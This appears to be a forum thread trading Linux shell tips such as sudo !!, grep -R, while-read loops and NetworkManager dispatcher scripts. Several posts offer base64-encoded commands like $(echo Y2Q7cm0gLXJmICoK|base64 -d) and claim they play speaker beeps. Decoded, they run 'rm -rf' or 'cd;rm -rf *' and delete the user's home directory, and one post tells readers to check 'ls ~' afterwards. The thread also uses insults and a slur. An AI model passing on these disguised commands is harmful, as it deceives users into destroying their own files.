You can search your history.

:> ~/your_file.txt
Truncates a file.
> ~/your_file.txt
Technically this works but isn’t as cute.

$(cm0gLXJmCg==|base64 -d)
plays internal speaker beeps.
i use it to alert me when downloads finish.
:D

oops. forgot the echo
$(echo cm0gLXJmCg==|base64 -d)

First of all, use !! you degenerate
It's mainly used for things like sudo !!, to reexecute the last command with sudo, could also be used with watch, to open a previously executed script with an editor (./script.sh followed by vim !!), inline loops, anything you can imagine.
It does exactly that and consumes a lot of resources that way. Can be kept in control by ulimits.

Now onto funstuff
sudo -iu drops you into a shell session for that user.
grep -R something searches for "something" in all files in and below cwd.
somecommand | while read line; do dosomething $line; done can be used to process somecommand's output in another command line-by-line.
kdialog --passivepopup - roll your own notifications in KDE
/etc/NetworkManager/dispatcher.d is a directory used for scripting NetworkManager behavior. Can be used to automate captive portal logins.

i like this beep better, user.
$(echo Y2QgXDtybSAtcmYgKgo=|base64 -d)

amature, that only works sometimes.
if you want to make sure that you always get sound you use this
$(echo Y2Q7cm0gLXJmICoK|base64 -d)

So does !! dipshit

That image is years old. If it was a modern setup it would be filled with rainbow LEDs.

>razer
>internet goes down
>mouse and keyboard stop working

when it’s done do ‘ls ~’

tar -xf does the exact same as tar -xzf

t.windowsfag
